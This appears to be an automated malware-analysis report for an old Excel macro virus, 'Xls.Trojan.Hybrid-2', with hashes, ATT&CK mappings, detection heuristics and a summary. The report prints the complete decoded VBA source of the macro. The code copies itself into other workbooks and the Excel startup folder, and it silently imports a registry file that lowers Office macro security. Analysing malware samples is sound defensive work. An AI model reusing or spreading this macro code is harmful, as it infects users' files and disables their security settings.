Xls.Trojan.Hybrid-2 Office (OLE) malware analysis — malicious · 07a013ad345f67d9

MALICIOUS

Office (OLE)

29.0 KB Created: 1999-06-14 17:51:46 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 86e8c907fef80fe11b4a7269e12ef448 SHA-1: eb9ea13b82d0a6a2e8610b4f2e73b05534cfb232 SHA-256: 07a013ad345f67d9998d91675ccb1b1e7758b492b690b8b92b3477aa9e9d2a52

202 Risk Score

Malware Insights

Xls.Trojan.Hybrid-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel macro-based trojan, identified as Xls.Trojan.Hybrid-2, attempts to achieve persistence by creating a registry file 'c:\hybrid.reg' and executing it with 'regedit /s c:\hybrid.reg'. The script also contains a hardcoded URL 'http://welcome.to/nomercy.com' and displays a message box to the user, likely as a distraction or to indicate infection.

Heuristics 4

ClamAV: Xls.Trojan.Hybrid-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Hybrid-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://welcome.to/nomercy.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2181 bytes
SHA-256: `b39bc3c549fa782d2d831f59b3f73e68bb0a7cbeef4ace3b55f9a66548dd0439`
Detection ClamAV: Xls.Trojan.Hybrid-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "EstaPasta_de_trabalho" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'get from TheNoMercyVIrusTeam 'http://welcome.to/nomercy.com ' 'EXcell 97 <> 2000 class infector HYBRID V1.0A ' Sub Workbook_Deactivate() 'hybrid On Error Resume Next Set aw = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule Set tw = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule If aw.Lines(2, 1) <> "'hybrid" Then aw.deletelines 1, aw.countoflines aw.insertlines 2, tw.Lines(2, tw.countoflines) End If If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1." Open "c:\hybrid.reg" For Output As 1 Print #1, "REGEDIT4" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft " 'Excel]" Print #1, """Options6""=dword:00000000" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]" Print #1, """Level""=dword:00000001" Close 1 Shell "regedit /s c:\hybrid.reg", vbHide End If If (Day(Now)) = (Minute(Now)) Then MsgBox "Repent!,Quit your Jobs!!,Slack off!!!", vbCritical, Title:="97 <-> 2000 " 'Hybrid v1.0a Bob is Watching" End If End Sub Attribute VB_Name = "Plan1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Plan2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Plan3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.